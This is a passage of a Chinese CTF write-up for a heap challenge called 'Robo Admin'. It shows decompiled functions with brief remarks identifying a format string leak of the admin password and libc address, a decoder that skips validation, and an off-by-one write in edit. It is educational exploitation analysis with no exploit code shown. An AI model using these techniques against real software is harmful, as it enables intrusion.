class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="n">a2</span> <span class="o">+</span> <span class="n">v9</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>解码器没有对格式化字符串的校验,可以利用这一点绕过前面的明文校验</p> <h4 id="showstatus">showstatus </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">showstatus</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kr">__int64</span> <span class="n">a2</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rdx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// rcx </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// r8 </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// r9 </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+0h] [rbp-40h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v8</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-38h] </span></span></span><span class="line"><span class="cl"> <span class="n">_QWORD</span> <span class="n">v9</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="c1">// [rsp+10h] [rbp-30h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v10</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-20h] </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v11</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v12</span><span class="p">;</span> <span class="c1">// [rsp+38h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v12</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="n">pwd1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v8</span> <span class="o">=</span> <span class="n">pwd2</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">strcpy</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">v9</span><span class="p">,</span> <span class="s">&#34;STACK_ANCHOR&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">BYTE5</span><span class="p">(</span><span class="n">v9</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">HIWORD</span><span class="p">(</span><span class="n">v9</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v10</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v11</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;=== Robo Admin Status ===&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Robot core: online&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Task queue: healthy&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;Notice: &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">ntc_tag</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">once</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;%s&#34;</span><span class="p">,</span> <span class="n">notice</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">once</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">printf</span><span class="p">(</span><span class="n">notice</span><span class="p">,</span> <span class="n">a2</span><span class="p">,</span> <span class="n">v2</span><span class="p">,</span> <span class="n">v3</span><span class="p">,</span> <span class="n">v4</span><span class="p">,</span> <span class="n">v5</span><span class="p">,</span> <span class="n">v7</span><span class="p">,</span> <span class="n">v8</span><span class="p">,</span> <span class="n">v9</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">v9</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">v10</span><span class="p">,</span> <span class="n">v11</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="o">&amp;</span><span class="n">whatelf</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;(empty)&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v12</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>有一次格式化字符串利用机会,可以泄露管理员密码和 libc 地址,然后获得进入管理员面板的权限</p> <h4 id="admin_panel-1">admin_panel </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="nf">admin_panel</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">nptr</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-20h] BYREF </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\n</span><span class="s">=== Task Menu ===&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;1. create&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;2. edit&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;3. query&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;4. list&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;5. delete&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;6. logout&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;&gt; &#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">nptr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">myread</span><span class="p">(</span><span class="n">nptr</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">switch</span> <span class="p">(</span> <span class="nf">atoi</span><span class="p">(</span><span class="n">nptr</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">1</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">create</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">2</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">edit</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">3</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">query</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">4</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">list</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">5</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">delete</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">case</span> <span class="mi">6</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v3</span> <span class="o">-</span> <span class="nf">__readfsqword</span><span class="p">(</span><span class="mh">0x28u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">default</span><span class="o">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] invalid&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>经典菜单堆题</p> <h4 id="create">create </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">create</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">v0</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+4h] [rbp-Ch] </span></span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">size</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-8h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">readidx</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="n">v0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="n">v0</span> <span class="o">&amp;</span> <span class="mh">0x80000000</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0LL</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">taskalive</span><span class="p">[(</span><span class="kt">int</span><span class="p">)</span><span class="n">v0</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] slot used&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">task_name</span> <span class="o">+</span> <span class="mi">24</span> <span class="o">*</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">v0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x18u</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;Task name:&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v1</span> <span class="o">=</span> <span class="p">(</span><span class="kr">__int64</span><span class="p">)</span><span class="nf">taskname_getptr</span><span class="p">(</span><span class="n">v3</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="nf">myread</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">v1</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v0</span> <span class="o">=</span> <span class="nf">readnum</span><span class="p">(</span><span class="s">&#34;Desc size:&#34;</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mh">0x200</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">size</span> <span class="o">=</span> <span class="n">v0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">task_desc</span><span class="p">[</span><span class="n">v3</span><span class="p">]</span> <span class="o">=</span> <span class="nf">malloc</span><span class="p">(</span><span class="n">v0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">task_desc</span><span class="p">[</span><span class="n">v3</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">task_desc</span><span class="p">[</span><span class="n">v3</span><span class="p">],</span> <span class="mi">0</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">task_size</span><span class="p">[</span><span class="n">v3</span><span class="p">]</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="nf">taskname_getptr_0x10</span><span class="p">(</span><span class="n">v3</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">taskalive</span><span class="p">[</span><span class="n">v3</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[+] task created&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;[X] malloc failed&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">v0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>可申请大小 200 以内任意 chunk ,同时可控 7 个 chunk</p> <h4 id="edit">edit </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">edit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kr">__int64</span> <span class="n">v0</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// r12 </span></span></span><span class="line"><span class="cl"> <span class="kt">ssize_t</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rbx </span></span></span><span class="line"><span class="cl"> <span class="kt">ssize_t</span> <span class="o">*</span><span class="n">v3</span><span class="p">;</span> <span class="c1">// rax </span></span></span><span class="line"><span class="cl"> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-24h] </span></span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">nbytes</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-20h] </span></span></span><span class="line"><span class="cl"> <span class="kt">ssize_t</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-18h] </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">LODWORD</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="nf">readidx</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="n">v0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">v0</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">taskalive</span><span class="p">[(</span><span class="kt">int</span><span class="p">)</span><span class="n">v0</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">v0</span> <span class="o">=</span> <span class="nf">readnum</span><span class="p">(</span><span class="s">&#34;Write length :&#34;</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">task_size</span><span class="p">[(</span><span class="kt">int</span><span class="p">)</span><span class="n">v0</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1LL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">nbytes</span> <span class="o">=</span> <span class="n">v0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nf">puts</span><span class="p">(</span><span class="s">&#34;New desc bytes:&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="nf">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">*</span><span class="p">((</span><span class="kt">void</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">task_desc</span> <span class="o">+</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">v5</span><span class="p">),</span> <span class="n">nbytes</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v7</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">task_size</span><span class="p">[</span><span class="n">v5</span><span class="p">]</span> <span class="o">&lt;=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int64</span><span class="p">)</span><span class="n">v7</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">task_size</span><span class="p">[</span><span class="n">v5</span><span class="p">]</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">task_desc</span> <span class="o">+</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">v5</span><span class="p">)</span> <span class="o">+</span> <span class="n">task_size</span><span class="p">[</span><span class="n">v5</span><span class="p">]</span> <span class="o">-</span> <span class="mi">1LL</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">task_desc</span> <span class="o">+</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">v5</span><span class="p">)</span> <span class="o">+</span> <span class="n">v7</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">v1</span> <span class="o">=</span> <span class="n">task_size</span><span class="p">[</span><span class="n">v5</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="n">v7</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="p">(</span><span class="kt">ssize_t</span> <span class="o">*</span><span class="p">)</span><span class="nf">taskname_getptr_0x10</span><span class="p">(</span><span class="n">v5</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">v1</span> <span class="o">&lt;=</span> <span class="n">v7</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="n">v1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="n">v3</span> <span class="o">=</span> <span class="n">v2</span><span class="p">;</span> </span></span><span 